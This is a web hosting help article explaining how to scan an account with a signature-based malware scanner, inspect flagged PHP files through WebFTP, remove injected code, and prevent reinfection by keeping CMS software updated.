Working with the scanner (searching for malicious files)

The scanner is designed to search for malicious code and files, such as web shell, spammers, etc., using a database of known code signatures. The scanner does not guarantee detection of a virus, and a detected malicious file is not necessarily a virus. Each result must be analyzed and verified.

You can select a path to check files, or check the entire hosting account. To do this, you must specify the path - the root of the account ( /home/hosting login ).

Next, enter the link to the signature databases. We recommend using a regularly updated database; to do this, click the "Updated URL" button.

Below are the file formats to exclude—files that will not be scanned by the scanner. If you have a torrent site, you should also add the torrent format.

By checking the "Save scan results" box, you'll save the results to a file that will be created in the root directory of your hosting account. This option is useful if you have a large number of files (more than 100,000) on your hosting account.

After checking the account with a scanner, we may see an unpleasant result (the screenshot shows an example).

Important

The scanner's primary categories are Critical Files and Large Encrypted Files. All other categories include files with features commonly used by malicious files.

The shaded field in the example shows the path to the file in which the code from the malicious signature database was detected.

The example shows several files, but in fact only two signatures were found:

1 - PCT4BA6ODSE

2 - wUu2jGoB;0i_SN\tn%Vg)ZI^sTRyvL

Open WebFTP in a new window, and in the path field, enter the path to one of the found files /home/LOGIN/folders/xd_receiver_ssl.php

Click on the file—it opens in text mode. At first, nothing suspicious appears visually.

But if you scroll sideways a little, you'll immediately see the malicious code:

Remove the malicious code and save the file.

This example indicates that malicious code was injected into a legitimate CMS file. This code should be removed from the file, but the file itself should be left intact, or simply replaced with the original.

It is necessary to carefully check any scan result and compare the files with the original ones from the developer.

Open the file /home/LOGIN/folders/diff.php via WebFTP :

We immediately see the encrypted code. There's no CMS code. There's a 98% chance this file is malicious, and the entire file must be deleted. It's quite possible that this file was the one that infected the others.

In the same way, we check each file indicated by the scanner.

Where do malicious files come from?

Website owners typically don't think about their site's security and aren't even aware that their sites could be used as a tool for infecting viruses, attacking other sites, or for other malicious purposes. In most cases, websites are hacked through vulnerabilities in their scripts.

How to protect yourself from website hacks?

If the website management system (engine, script) was written independently, you need to search for vulnerabilities and fix them. In the case of ready-made CMS solutions (WordPress, Joomla, DLE, Drupal, etc.), you must use only the latest, original, and official version of the CMS script from the developers.

Attention!

Don't use nulled (decoded/hacked) versions of CMS. Don't install add-ons, plugins, modules, hacks, themes, and other add-ons from dubious, unofficial sources—unscrupulous add-on developers may inject code into their development that allows access to all website files, which can cause serious problems for you.

Important

It is necessary to regularly update the CMS version and all installed add-ons, plugins, and extensions to the latest versions, since it is in the latest versions that developers close many vulnerabilities in their product.

Please note that if you delete these files or the malicious code within them without investigating the cause, they will reappear after a while. Be sure to check your CMS and/or plugins for updates, or fix any script vulnerabilities yourself.